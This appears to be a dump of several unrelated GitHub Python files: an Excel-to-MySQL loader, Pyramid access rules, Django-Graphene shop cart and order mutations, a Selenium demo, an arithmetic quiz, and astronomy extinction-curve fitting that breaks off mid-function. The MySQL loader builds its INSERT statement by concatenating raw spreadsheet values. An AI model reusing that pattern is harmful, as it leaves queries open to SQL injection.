print('\\n***PASSED***\\n')\n","repo_name":"LisaLen/code-challenge","sub_path":"interview_cake_chals/find_repeat_space_edition.py","file_name":"find_repeat_space_edition.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"15152511295","text":"\nimport xlrd\nimport sys\nfrom mysql import MysqlOperation\n\n# 传入的数据\n\n\n# tpye 表示插入的表,hang表示插入的主键\n\n\ndef _ref(_type, data):\n _type = str(_type)\n print(_type, data)\n obj = MysqlOperation() # 对象\n insertsql = 'INSERT ignore INTO excel(content,_image,_image1,_image2,content_time,ratesku,ratesku2,user,id)VALUES(\"' +data[0] + '\",\"' +data[1] + '\",\"' +data[2] +'\",\"' +data[3] +'\",\"' +data[4] +'\",\"' +data[5] +'\",\"' +data[6] +'\",\"' +data[7]+'\",\"'+_type+'\")'\n print(insertsql)\n\n sql = \"\"\"\n create table if not exists excel(\n content varchar(30) not null, \n _image varchar(30) not null,\n _image1 varchar(30) not null,\n _image2 varchar(30) not null,\n content_time varchar(30) not null,\n ratesku varchar(30) not null,\n ratesku2 varchar(30) not null,\n user varchar(30) not null,\n id varchar(30) not null,\n primary key ( `id` )\n )\"\"\"\n print(\"sql\", _type, sql)\n obj.__enter__()\n obj.execute(sql)\n obj.execute(insertsql) \n obj.__exit__()\n\n\ndef read_excel():\n book = xlrd.open_workbook('pike.xlsx')\n sheet1 = book.sheets()[0]\n nrows = sheet1.nrows\n # print('表格总行数', nrows)\n ncols = sheet1.ncols\n # print('表格总列数', ncols)\n _list = []\n for lie in range(nrows):\n # print(sheet1.cell(0, 2).value)\n for hang in range(ncols):\n\n print(lie, hang)\n #\n try:\n data = sheet1.cell(lie, hang).value\n if type(data) != \"str\":\n data = str(data)\n else:\n print()\n print(\"type\", type(data))\n\n if (data == \"\" or data == None):\n # print(\"数据为空\", data)\n _list.append(\"\")\n else:\n # _ref(lie, sheet1.cell(hang, lie).value, hang)\n # print(\"dd\")\n _list.append(data)\n except:\n print(\"error\")\n pass\n continue\n\n # print(/n)\n print(\"换行\")\n # print(\"list\", _list)\n _ref(lie, _list)\n _list.clear()\n\n\n # print('第3行第3列的单元格的值:', cell_3_3)\n # book = xlrd.open_workbook('pike.xlsx')\n # sheet1 = book.sheets()[0]\n # nrows = sheet1.nrows\n # print('表格总行数',nrows)\n # ncols = sheet1.ncols\n # print('表格总列数',ncols)\n # row3_values = sheet1.row_values(2)\n # print('第3行值',row3_values)\n # col3_values = sheet1.col_values(2)\n # print('第3列值',col3_values)\n # cell_3_3 = sheet1.cell(2,2).value\n # print('第3行第3列的单元格的值:',cell_3_3)\nif __name__ == '__main__':\n read_excel()\n # sys.exit()\n","repo_name":"zhiseyinghua/pachong","sub_path":"excel/zhuan.py","file_name":"zhuan.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"8"} +{"seq_id":"36084549921","text":"from pyramid.threadlocal import get_current_request\n\nfrom pyramid.security import (\n Allow,\n Everyone,\n Authenticated,\n authenticated_userid,\n has_permission,\n)\n\nfrom pyrtos.models import User\n\n\nclass EntryFactory(object):\n \"\"\"\n A standard Pyramid EntryFactory object snagged and extended\n from one of the pyramid tutorials @ readthedocs.\n\n This is just a simple mockup class for the begining of the\n project.\n \"\"\"\n __name__ = None\n __parent__ = None\n __acl__ = [(Allow, Authenticated, 'view'),\n (Allow, Authenticated, 'create'),\n (Allow, Authenticated, 'edit'),\n (Allow, 'group:admin', 'delete'),\n (Allow, 'group:admin', 'archive'),\n (Allow, 'group:admin', 'restore'), ]\n\n def __init__(self, request):\n pass\n\n\ndef groupfinder(userid, request):\n \"\"\"\n A simple groupfinder for picking the right permission\n to the right users.\n\n userid -- integer, userid.\n request -- object, standard request object.\n \"\"\"\n user = User.by_id(userid)\n group = user.group\n return ['group:'+group]\n\n\ndef can_i(request, perm):\n \"\"\"\n Function for checking permisssions based on users group\n identification. This function is made for use in templates.\n\n request -- object, standard request object.\n perm -- string, for matching against group permission.\n \"\"\"\n return has_permission(perm, request.context, request)\n","repo_name":"plastboks/Pyrtos","sub_path":"pyrtos/security.py","file_name":"security.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"8"} +{"seq_id":"22996865950","text":"import graphene\nfrom django.db.models import F\nfrom products.models import Product\nfrom accounts.models import CustomUser\nfrom django.contrib.auth import authenticate\nfrom graphql_jwt.settings import jwt_settings\nfrom orders.models import Cart, Order, PaymentType, BillingInfo, CartObject\nfrom .types import(ProductType, TagsType, ColorsType, UsersType,\n UsersAuthType, OrderType, BillingInfoType, PaymentTypeType)\nfrom django_graphene_permissions.permissions import permissions_checker, IsAuthenticated\n\n\nclass UpdateCart(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n cart = graphene.String()\n item = graphene.String()\n authed = graphene.Boolean()\n action = graphene.String()\n\n def mutate(self, info, cart, item, authed, action):\n actions = [\"inc\", \"dec\"]\n if not action in actions:\n raise Exception(\"action unknown\")\n if authed:\n if not info.context.user.is_authenticated:\n raise Exception(\"user is not authenticated\")\n cart = Cart.objects.filter(user=info.context.user)\n if not cart.exists():\n raise Exception(\"cart not found authed\")\n try:\n if action == \"dec\":\n cart[0].items.filter(id=item).update(amount=F('amount')-1)\n if action == \"inc\":\n cart[0].items.filter(id=item).update(amount=F('amount')+1)\n except Exception as e:\n raise Exception(e)\n else:\n cart = Cart.objects.filter(anon_usr=cart)\n if not cart.exists():\n raise Exception(\"cart not found\")\n try:\n if action == \"dec\":\n cart[0].items.filter(id=item).update(amount=F('amount')-1)\n if action == \"inc\":\n cart[0].items.filter(id=item).update(amount=F('amount')+1)\n except Exception as e:\n raise Exception(e)\n return RemoveCartItem(payload=True)\n\n\nclass RemoveCartItem(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n cart = graphene.String()\n item = graphene.String()\n authed = graphene.Boolean()\n\n def mutate(self, info, cart, item, authed):\n if authed:\n if not info.context.user.is_authenticated:\n raise Exception(\"user is not authenticated\")\n cart = Cart.objects.filter(user=info.context.user)\n if not cart.exists():\n raise Exception(\"cart not found authed\")\n try:\n cart[0].items.filter(id=item).delete()\n except Exception as e:\n raise Exception(e)\n else:\n cart = Cart.objects.filter(anon_usr=cart)\n if not cart.exists():\n raise Exception(\"cart not found\")\n try:\n cart[0].items.filter(id=item).delete()\n except Exception as e:\n raise Exception(e)\n return RemoveCartItem(payload=True)\n\n\nclass AddToCartAnon(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n product = graphene.String()\n amount = graphene.Int()\n cart = graphene.String()\n\n def mutate(self, info, product, amount, cart):\n prod = Product.objects.filter(id=product)\n if not prod.exists():\n raise Exception(\"product not found\")\n finCart = None\n userCart = Cart.objects.filter(anon_usr=cart)\n if userCart.exists():\n finCart = userCart[0]\n else:\n finCart = Cart.objects.create(anon_usr=cart)\n finCart.items.create(\n product=prod[0], amount=amount)\n return AddToCartUsr(payload=True)\n\n\nclass AddToCartUsr(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n product = graphene.String()\n amount = graphene.Int()\n\n def mutate(self, info, product, amount):\n prod = Product.objects.filter(id=product)\n if not prod.exists():\n raise Exception(\"product not found\")\n finCart = None\n userCart = Cart.objects.filter(user=info.context.user)\n if userCart.exists():\n finCart = userCart[0]\n else:\n finCart = Cart.objects.create(user=info.context.user)\n finCart.items.create(\n product=prod[0], amount=amount)\n return AddToCartUsr(payload=True)\n\n\nclass NewUserMutation(graphene.Mutation):\n payload = graphene.Field(UsersAuthType)\n\n class Arguments:\n first_name = graphene.String()\n last_name = graphene.String()\n phone = graphene.String()\n email = graphene.String()\n birth_date = graphene.Date()\n password = graphene.String()\n cart_id = graphene.String()\n\n def mutate(self, info, first_name, last_name, phone, email, password, birth_date, cart_id):\n try:\n user = CustomUser.objects.create(\n email=email, first_name=first_name, last_name=last_name, phone=phone,\n birth_date=birth_date\n )\n user.username = str(user.user_id)\n user.set_password(password)\n user.save()\n # check cart status and creat a new one\n cart = Cart.objects.filter(anon_usr=cart_id)\n if cart.exists():\n print('HEYYYYYY')\n cart.update(user=user, anonnymous=False)\n else:\n Cart.objects.create(\n user=user, anonnymous=False, anon_usr=cart_id)\n usr = authenticate(request=info.context.session,\n username=email, password=password)\n payload = jwt_settings.JWT_PAYLOAD_HANDLER(usr, info.context)\n token = jwt_settings.JWT_ENCODE_HANDLER(payload, info.context)\n\n except Exception as e:\n raise Exception(e)\n return NewUserMutation(payload={\"udata\": user, \"token\": token})\n\n\nclass AddOrder(graphene.Mutation):\n payload = graphene.Field(OrderType)\n\n class Arguments:\n full_name = graphene.String()\n phone = graphene.String()\n address_line = graphene.String()\n city = graphene.String()\n region = graphene.String()\n payment = graphene.String()\n\n @permissions_checker([IsAuthenticated])\n def mutate(self, info, full_name, phone, address_line, city, region, payment):\n user = info.context.user\n userCart = Cart.objects.filter(user=user)\n billingInfo = BillingInfo.objects.create(\n address_line=address_line, city=city, full_name=full_name, phone=phone, region=region\n )\n # check payment option availablity\n payment_opt = PaymentType.objects.filter(type_id=payment)\n if not payment_opt.exists():\n raise Exception(\"payment type unknown\")\n order = Order.objects.create(\n paid_already=False, ordered_by=user,\n billing_info=billingInfo,\n payment_type=payment_opt[0])\n # order.billing_info\n if not userCart[0].items.exists():\n raise Exception(\"cart is empty\")\n\n for cart in userCart[0].items.all():\n order.products.add(\n cart\n )\n # clear the cart after checkout\n userCart[0].items.clear()\n return AddOrder(payload=order)\n\n\nclass SubmitRefId(graphene.Mutation):\n payload = graphene.Boolean()\n\n class Arguments:\n order = graphene.String()\n ref = graphene.String()\n\n @permissions_checker([IsAuthenticated])\n def mutate(self, info, order, ref):\n # TO DO CHECK ORDERED BY FLAG LATER\n order = Order.objects.filter(\n core_order_id=order, ordered_by=info.context.user)\n if not order.exists():\n raise Exception(\"order not found\")\n order.update(reference_no=ref)\n return SubmitRefId(payload=True)\n","repo_name":"amenabe22/taywan_shop","sub_path":"taywan_backend/mutations.py","file_name":"mutations.py","file_ext":"py","file_size_in_byte":7925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"13921954490","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\ndrive = webdriver.Chrome()\ndrive.get('http://www.baidu.com')\ntime.sleep(3)\n#drive.find_element_by_xpath(\"//input[@id='kw' and @name='wd']\").send_keys('baidu')\n#drive.find_elements_by_css_selector('.s_ipt').send_keys('baidu')\n#drive.find_element(By.ID,\"kw\").send_keys('1111')\ndrive.find_element(\"id\",\"kw\").send_keys('1111')\ndrive.implicitly_wait(2)\n#定位编码\nst = drive.current_window_handle\nprint(st)\n#截图\ndrive.save_screenshot('page.png')\ndrive.quit()","repo_name":"suntianxu/Inter_Auto_Test","sub_path":"new_demo/new_demo01/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"20253824533","text":"import random\ndef out_res_expr(s):\n\tif (s.find('+') != -1):\n\t\tp = s.split('+')\n\t\treturn (int(p[0]) + int(p[1]))\n\tif (s.find('-') != -1):\n\t\tp = s.split('-')\n\t\treturn (int(p[0]) - int(p[1]))\n\tif (s.find('*') != -1):\n\t\tp = s.split('*')\n\t\treturn (int(p[0]) * int(p[1]))\ndef rand_simple():\n\ta=random.randint(2,9)\n\tb=random.randint(2,9)\n\tz=random.choice('+-*')\n\ts=str(a)+z+str(b)\n\tprint(s)\n\treturn(s)\ndef inp():\n\twhile True:\n\t\ttry:\n\t\t\tvar = int(input())\n\t\t\tmessage = \"Incorrect format\"\n\t\t\tassert (var==1 or var==2), message\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"Incorrect format\")\n\t\texcept AssertionError as err:\n\t\t\tprint(err)\n\treturn var\ndef input_user():\n\twhile True:\n\t\ttry:\n\t\t\tuser = int(input())\n\t\t\tbreak\n\t\texcept ValueError:\n\t\t\tprint(\"Incorrect format\")\n\treturn user\ndef exam(var, i):\n\tif var == 1:\n\t\ts = rand_simple()\n\t\tuser = input_user()\n\t\tres = out_res_expr(s)\n\telse:\n\t\ts = random.randint(11, 29)\n\t\tprint(s)\n\t\tuser = input_user()\n\t\tres = s * s\n\tif user == res:\n\t\tprint(\"Right!\")\n\t\ti += 1\n\telse:\n\t\tprint(\"Wrong!\")\n\treturn i\ndef write_res(name,i,var,level):\n\tfile=open(\"results.txt\",'a')\n\tfile.write(name+\": \"+str(i)+\"/5 in level \"+str(var)+\" (\"+level+\").\\n\")\n\nprint(\"Which level do you want? Enter a number:\")\nprint(\"1 - simple operations with numbers 2-9\")\nprint(\"2 - integral squares of 11-29\")\nvar=inp()\nif var==1:\n\tlevel=\"simple operations with numbers 2-9\"\nelse:\n\tlevel=\"integral squares of 11-29\"\ni=0\nfor _ in range(5):\n\ti=exam(var, i)\nprint(f\"Your mark is {i}/5. Would you like to save the result? Enter yes or no.\")\nans=input()\nif ans.lower() in \"yes\":\n\tprint(\"What is your name?\")\n\tname=input()\n\twrite_res(name,i,var,level)\n\tprint('The results are saved in \"results.txt\"')\n\n\n","repo_name":"JuliaBelokopytskaya/Python_Core","sub_path":"Arithmetic-Exam-Application/arithmetic.py","file_name":"arithmetic.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"} +{"seq_id":"44591594227","text":"#!/usr/bin/env python\n\nimport warnings\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport astropy.units as u\n\nfrom astropy.modeling.powerlaws import PowerLaw1D\nfrom astropy.modeling.polynomial import Polynomial1D\nfrom astropy.modeling.models import (\n Linear1D,\n Drude1D,\n Gaussian1D,\n Lorentz1D,\n custom_model,\n)\nfrom astropy.modeling.fitting import LevMarLSQFitter, LinearLSQFitter\nfrom astropy import uncertainty as unc\n\nfrom measure_extinction.extdata import ExtData\nfrom measure_extinction.stardata import StarData\nfrom measure_extinction.plotting.plot_spec import plot_spectrum\nfrom dust_extinction.conversions import AxAvToExv\n\nfrom emcee_fitting import EmceeFitter\n\n# gamma function (wavelength dependent width, replacing the FWHM)\ndef gamma(x, x_o=1, gamma_o=1, asym=1):\n return 2.0 * gamma_o / (1.0 + np.exp(asym * (x - x_o)))\n\n\n# asymmetric Gaussian\ndef gauss_asymmetric(x, scale=1, x_o=1, gamma_o=1, asym=1):\n # gamma replaces FWHM, so stddev=gamma/(2sqrt(2ln2))\n y = scale * np.exp(\n -((x - x_o) ** 2)\n / (2 * (gamma(x, x_o, gamma_o, asym) / (2 * np.sqrt(2 * np.log(2)))) ** 2)\n )\n return y\n\n\n# \"asymmetric\" Drude\ndef drude_asymmetric(x, scale=1, x_o=1, gamma_o=1, asym=1):\n y = (\n scale\n * (gamma(x, x_o, gamma_o, asym) / x_o) ** 2\n / ((x / x_o - x_o / x) ** 2 + (gamma(x, x_o, gamma_o, asym) / x_o) ** 2)\n )\n return y\n\n\n# asymmetric Lorentzian\ndef lorentz_asymmetric(x, scale=1, x_o=1, gamma_o=1, asym=1):\n # gamma replaces FWHM, so gamma_formula=gamma/2\n y = (\n scale\n * (gamma(x, x_o, gamma_o, asym) / 2) ** 2\n / ((gamma(x, x_o, gamma_o, asym) / 2) ** 2 + (x - x_o) ** 2)\n )\n return y\n\n\ndef fit_function(\n dattype=\"elx\",\n functype=\"pow\",\n dense=False,\n profile=\"gauss_asym\",\n fixed=False,\n AV_guess=3,\n):\n \"\"\"\n Define the fitting function\n\n Parameters\n ----------\n dattype : string [default=\"elx\"]\n Data type to fit (\"elx\" or \"alax\")\n\n functype : string [default=\"pow\"]\n Fitting function type (\"pow\" for powerlaw or \"pol\" for polynomial)\n\n dense : boolean [default=False]\n Whether or not to fit the feature around 3 micron\n\n profile : string [default=\"gauss_asym\"]\n Profile to use for the features if dense = True (options are \"gauss\", \"drude\", \"lorentz\", \"gauss_asym\", \"drude_asym\", \"lorentz_asym\")\n\n fixed : boolean [default=False]\n Whether or not to add a fixed feature around 3 micron (for diffuse sightlines)\n\n AV_guess : float [default=3]\n Initial guess for A(V)\n\n Returns\n -------\n func : Astropy CompoundModel\n The fitting function\n \"\"\"\n # powerlaw model\n if functype == \"pow\":\n func = PowerLaw1D(fixed={\"x_0\": True})\n elif functype == \"pol\": # polynomial model\n func = Polynomial1D(degree=6)\n else:\n warnings.warn(\n 'Unknown function type, choose \"pow\" for a powerlaw or \"pol\" for a polynomial',\n stacklevel=2,\n )\n\n # add profiles for the features if requested\n if dense:\n # define different profiles\n # 1 Gaussian (stddev=FWHM/(2sqrt(2ln2)))\n gauss1 = Gaussian1D(mean=3, stddev=0.13, bounds={\"stddev\": (0.1, 0.2)})\n\n # 2 Gaussians (stddev=FWHM/(2sqrt(2ln2)))\n gauss2 = Gaussian1D(\n mean=3, stddev=0.13, bounds={\"stddev\": (0.12, 0.16)}\n ) + Gaussian1D(\n mean=3.4, stddev=0.14, bounds={\"mean\": (3.41, 3.45), \"stddev\": (0.14, 0.2)}\n )\n\n # 1 Drude\n drude1 = Drude1D(x_0=3, fwhm=0.3, bounds={\"fwhm\": (0.2, 0.5)})\n\n # 2 Drudes\n drude2 = Drude1D(x_0=3, fwhm=0.3) + Drude1D(\n x_0=3.4, fwhm=0.15, bounds={\"x_0\": (3.35, 3.43), \"fwhm\": (0.14, 0.3)}\n )\n\n # 1 Lorentzian\n lorentz1 = Lorentz1D(x_0=3, fwhm=0.3, bounds={\"x_0\": (2.99, 3.1)})\n\n # 2 Lorentzians\n lorentz2 = Lorentz1D(\n x_0=3, fwhm=0.3, bounds={\"x_0\": (2.99, 3.1), \"fwhm\": (0.28, 0.4)}\n ) + Lorentz1D(\n x_0=3.4, fwhm=0.15, bounds={\"x_0\": (3.35, 3.43), \"fwhm\": (0.14, 0.3)}\n )\n\n # 1 asymmetric Gaussian\n Gaussian_asym = custom_model(gauss_asymmetric)\n gauss_asym1 = Gaussian_asym(\n x_o=3,\n gamma_o=0.4,\n bounds={\"x_o\": (2.9, 3.1), \"gamma_o\": (0.35, 2), \"asym\": (-100, 100)},\n )\n\n # 2 asymmetric Gaussians\n gauss_asym2 = Gaussian_asym(\n x_o=3,\n gamma_o=0.3,\n bounds={\"x_o\": (2.99, 3.04), \"gamma_o\": (0.28, 0.5), \"asym\": (-10, 10)},\n ) + Gaussian_asym(\n x_o=3.4,\n gamma_o=0.15,\n bounds={\n \"x_o\": (3.3, 3.42),\n \"scale\": (0.005, None),\n \"gamma_o\": (0.15, 0.5),\n \"asym\": (-20, -4),\n },\n )\n\n # 1 \"asymmetric\" Drude\n Drude_asym = custom_model(drude_asymmetric)\n drude_asym1 = Drude_asym(\n x_o=3.0,\n gamma_o=0.3,\n bounds={\n \"scale\": (0, 2),\n \"x_o\": (2.5, 3.5),\n \"gamma_o\": (-2, 2),\n \"asym\": (-50, 50),\n },\n )\n\n # 2 \"asymmetric\" Drudes\n drude_asym2 = Drude_asym(x_o=3, gamma_o=0.3) + Drude_asym(\n x_o=3.4, gamma_o=0.15, bounds={\"x_o\": (3.35, 3.45)}\n )\n\n # 1 asymmetric Lorentzian\n Lorentzian_asym = custom_model(lorentz_asymmetric)\n lorentz_asym1 = Lorentzian_asym(x_o=3, gamma_o=0.3, bounds={\"x_o\": (2.95, 3.1)})\n\n # 2 asymmetric Lorentzians\n lorentz_asym2 = Lorentzian_asym(x_o=3, gamma_o=0.3) + Lorentzian_asym(\n x_o=3.4, gamma_o=0.15\n )\n\n profiles = {\n \"gauss1\": gauss1,\n \"drude1\": drude1,\n \"lorentz1\": lorentz1,\n \"gauss_asym1\": gauss_asym1,\n \"drude_asym1\": drude_asym1,\n \"lorentz_asym1\": lorentz_asym1,\n \"gauss2\": gauss2,\n \"drude2\": drude2,\n \"lorentz2\": lorentz2,\n \"gauss_asym2\": gauss_asym2,\n \"drude_asym2\": drude_asym2,\n \"lorentz_asym2\": lorentz_asym2,\n }\n func += profiles[profile]\n\n if fixed:\n # fit a fixed feature for diffuse sightlines\n Drude_asym = custom_model(drude_asymmetric)\n func += Drude_asym(\n x_o=3.017727049,\n gamma_o=0.462375776,\n asym=-2.873011454,\n bounds={\"scale\": (0, 2)},\n fixed={\"x_o\": True, \"gamma_o\": True, \"asym\": True},\n )\n\n # convert the function from A(lambda)/A(V) to E(lambda-V)\n if dattype == \"elx\":\n func = func | AxAvToExv(Av=AV_guess)\n\n return func\n\n\ndef fit_features_spec(star, path):\n \"\"\"\n Fit the features directly from the spectrum with different profiles\n\n Parameters\n ----------\n star : string\n Name of the reddened star for which to fit the features in the spectrum\n\n path : string\n Path to the data files\n\n Returns\n -------\n waves : np.ndarray\n Numpy array with wavelengths\n\n flux_sub : np.ndarray\n Numpy array with continuum subtracted fluxes\n\n results : list\n List with the fitted models for different profiles\n \"\"\"\n # obtain the spectrum of the reddened star\n stardata = StarData(star + \".dat\", path)\n npts = stardata.data[\"SpeX_LXD\"].npts\n waves = stardata.data[\"SpeX_LXD\"].waves.value\n flux_unc = stardata.data[\"SpeX_LXD\"].uncs\n\n # \"manually\" obtain the continuum from the spectrum (i.e. read the flux at 2.4 and 3.6 micron)\n plot_spectrum(\n star,\n path,\n mlam4=True,\n range=[2, 4.5],\n exclude=[\"IRS\", \"STIS_Opt\"],\n )\n\n # fit the continuum reference points with a straight line\n ref_waves = [2.4, 3.6]\n fluxes = [3.33268e-12, 4.053e-12]\n func = Linear1D()\n fit = LinearLSQFitter()\n fit_result = fit(func, ref_waves, fluxes)\n\n # subtract the continuum from the fluxes\n fluxes = stardata.data[\"SpeX_LXD\"].fluxes.value * waves ** 4 - fit_result(waves)\n\n # define different profiles\n # 2 Gaussians (stddev=FWHM/(2sqrt(2ln2)))\n gauss = Gaussian1D(mean=3, stddev=0.13) + Gaussian1D(\n mean=3.4, stddev=0.06, fixed={\"mean\": True}\n )\n\n # 2 Drudes\n drude = Drude1D(x_0=3, fwhm=0.3) + Drude1D(x_0=3.4, fwhm=0.15, fixed={\"x_0\": True})\n\n # 2 Lorentzians\n lorentz = Lorentz1D(x_0=3, fwhm=0.3) + Lorentz1D(\n x_0=3.4, fwhm=0.15, fixed={\"x_0\": True}\n )\n\n # 2 asymmetric Gaussians\n Gaussian_asym = custom_model(gauss_asymmetric)\n gauss_asym = Gaussian_asym(x_o=3, gamma_o=0.3) + Gaussian_asym(\n x_o=3.4, gamma_o=0.15, fixed={\"x_o\": True}\n )\n\n # 2 \"asymmetric\" Drudes\n Drude_asym = custom_model(drude_asymmetric)\n drude_asym = Drude_asym(x_o=3, gamma_o=0.3) + Drude_asym(\n x_o=3.4, gamma_o=0.15, fixed={\"x_o\": True}\n )\n\n # 2 asymmetric Lorentzians\n Lorentzian_asym = custom_model(lorentz_asymmetric)\n lorentz_asym = Lorentzian_asym(x_o=3, gamma_o=0.3) + Lorentzian_asym(\n x_o=3.4, gamma_o=0.15, fixed={\"x_o\": True}\n )\n\n # 1 asymmetric Drude\n drude_asym1 = Drude_asym(x_o=3, gamma_o=0.3)\n\n profiles = [\n gauss,\n drude,\n lorentz,\n gauss_asym,\n drude_asym,\n lorentz_asym,\n drude_asym1,\n ]\n\n # fit the different profiles\n fit2 = LevMarLSQFitter()\n results = []\n mask1 = (waves > 2.4) & (waves < 3.6)\n mask2 = mask1 * (npts > 0)\n\n for profile in profiles:\n fit_result = fit2(\n profile,\n waves[mask2],\n fluxes[mask2],\n weights=1 / flux_unc[mask2],\n maxiter=10000,\n )\n results.append(fit_result)\n print(fit_result)\n print(\n \"Chi2\",\n np.sum(((fluxes[mask2] - fit_result(waves[mask2])) / flux_unc[mask2]) ** 2),\n )\n\n return waves[mask1], fluxes[mask1], npts[mask1], results\n\n\ndef fit_features_ext(starpair, path):\n \"\"\"\n Fit the extinction features separately with different profiles\n\n Parameters\n ----------\n starpair : string\n Name of the star pair for which to fit the extinction features, in the format \"reddenedstarname_comparisonstarname\" (no spaces)\n\n path : string\n Path to the data files\n\n Returns\n -------\n waves : np.ndarray\n Numpy array with wavelengths\n\n exts_sub : np.ndarray\n Numpy array with continuum subtracted extinctions\n\n results : list\n List with the fitted models for different profiles\n \"\"\"\n # first, fit the continuum, excluding the region of the features\n fit_spex_ext(starpair, path, exclude=[(2.8, 3.6)])\n\n # retrieve the SpeX data to be fitted, and sort the curve from short to long wavelengths\n extdata = ExtData(\"%s%s_ext.fits\" % (path, starpair.lower()))\n (waves, exts, exts_unc) = extdata.get_fitdata([\"SpeX_SXD\", \"SpeX_LXD\"])\n indx = np.argsort(waves)\n waves = waves[indx].value\n exts = exts[indx]\n exts_unc = exts_unc[indx]\n\n # subtract the fitted (powerlaw) continuum from the data, and select the relevant region\n params = extdata.model[\"params\"]\n exts_sub = exts - (params[0] * params[3] * waves ** (-params[2]) - params[3])\n mask = (waves >= 2.8) & (waves <= 3.6)\n waves = waves[mask]\n exts_sub = exts_sub[mask]\n exts_unc = exts_unc[mask]\n\n # define different profiles\n # 2 Gaussians (stddev=FWHM/(2sqrt(2ln2)))\n gauss = Gaussian1D(mean=3, stddev=0.13) + Gaussian1D(mean=3.4, stddev=0.06)\n\n # 2 Drudes\n drude = Drude1D(x_0=3, fwhm=0.3) + Drude1D(x_0=3.4, fwhm=0.15)\n\n # 2 Lorentzians\n lorentz = Lorentz1D(x_0=3, fwhm=0.3) + Lorentz1D(x_0=3.4, fwhm=0.15)\n\n # 2 asymmetric Gaussians\n Gaussian_asym = custom_model(gauss_asymmetric)\n gauss_asym = Gaussian_asym(x_o=3, gamma_o=0.3) + Gaussian_asym(\n x_o=3.4, gamma_o=0.15\n )\n\n # 2 \"asymmetric\" Drudes\n Drude_asym = custom_model(drude_asymmetric)\n drude_asym = Drude_asym(x_o=3, gamma_o=0.3) + Drude_asym(x_o=3.4, gamma_o=0.15)\n\n # 2 asymmetric Lorentzians\n Lorentzian_asym = custom_model(lorentz_asymmetric)\n lorentz_asym = Lorentzian_asym(x_o=3, gamma_o=0.3) + Lorentzian_asym(\n x_o=3.4, gamma_o=0.15\n )\n\n profiles = [gauss, drude, lorentz, gauss_asym, drude_asym, lorentz_asym]\n\n # fit the different profiles\n fit = LevMarLSQFitter()\n results = []\n for profile in profiles:\n fit_result = fit(profile, waves, exts_sub, weights=1 / exts_unc, maxiter=10000)\n results.append(fit_result)\n print(fit_result)\n print(\"Chi2\", np.sum(((exts_sub - fit_result(waves)) / exts_unc) ** 2))\n\n return waves, exts_sub, results\n\n\ndef fit_spex_ext(\n starpair,\n path,\n functype=\"pow\",\n dense=False,\n profile=\"drude_asym\",\n exclude=None,\n bootstrap=False,\n fixed=False,\n):\n \"\"\"\n Fit the observed SpeX NIR extinction curve\n\n Parameters\n ----------\n starpair : string\n Name of the star pair for which to fit the extinction curve, in the format \"reddenedstarname_comparisonstarname\" (no spaces), or \"average\" to fit the average extinction curve\n\n path : string\n Path to the data files\n\n functype : string [default=\"pow\"]\n Fitting function type (\"pow\" for powerlaw or \"pol\" for polynomial)\n\n dense : boolean [default=False]\n Whether or not to fit the features around 3 and 3.4 micron\n\n profile : string [default=\"drude_asym\"]\n Profile to use for the features if dense = True (options are \"gauss\", \"drude\", \"lorentz\", \"gauss_asym\", \"drude_asym\", \"lorentz_asym\")\n\n exclude : list of tuples [default=None]\n list of tuples (min,max) with wavelength regions (in micron) that need to be excluded from the fitting, e.g. [(0.8,1.2),(2.2,5)]\n\n bootstrap : boolean [default=False]\n Whether or not to do a quick bootstrap fitting to get more realistic uncertainties on the fitting results\n\n fixed : boolean [default=False]\n Whether or not to add a fixed feature around 3 micron (for diffuse sightlines)\n\n Returns\n -------\n Updates extdata.model[\"type\", \"waves\", \"exts\", \"residuals\", \"chi2\", \"params\"] and extdata.columns[\"AV\"] with the fitting results:\n - type: string with the type of model (e.g. \"pow_elx_Drude\")\n - waves: np.ndarray with the SpeX wavelengths\n - exts: np.ndarray with the fitted model to the extinction curve at \"waves\" wavelengths\n - residuals: np.ndarray with the residuals, i.e. data-fit, at \"waves\" wavelengths\n - chi2 : float with the chi square of the fitting\n - params: list with output Parameter objects\n \"\"\"\n # retrieve the SpeX data to be fitted, and sort the curve from short to long wavelengths\n filename = \"%s%s_ext.fits\" % (path, starpair.lower())\n if fixed:\n filename = filename.replace(\".\", \"_ice.\")\n extdata = ExtData(filename)\n (waves, exts, exts_unc) = extdata.get_fitdata([\"SpeX_SXD\", \"SpeX_LXD\"])\n indx = np.argsort(waves)\n waves = waves[indx].value\n exts = exts[indx]\n exts_unc = exts_unc[indx]\n\n # exclude wavelength regions if requested\n if exclude:\n mask = np.full_like(waves, False, dtype=bool)\n for region in exclude:\n mask += (waves > region[0]) & (waves < region[1])\n waves = waves[~mask]\n exts = exts[~mask]\n exts_unc = exts_unc[~mask]\n\n # get a quick estimate of A(V)\n if extdata.type == \"elx\":\n extdata.calc_AV()\n AV_guess = extdata.columns[\"AV\"]\n else:\n AV_guess = None\n\n # convert to A(lambda)/A(1 micron)\n # ind1 = np.abs(waves - 1).argmin()\n # exts = exts / exts[ind1]\n # exts_unc = exts_unc / exts[ind1]\n\n # obtain the function to fit\n if \"SpeX_LXD\" not in extdata.waves.keys():\n dense = False\n fixed = False\n func = fit_function(\n dattype=extdata.type,\n functype=functype,\n dense=dense,\n profile=profile,\n AV_guess=AV_guess,\n fixed=fixed,\n )\n\n # for dense sightlines, add more weight to the feature region\n weights = 1 / exts_unc\n if dense:\n mask_ice = (waves > 2.88) & (waves < 3.19)\n mask_tail = (waves > 3.4) & (waves < 4)\n weights[mask_ice + 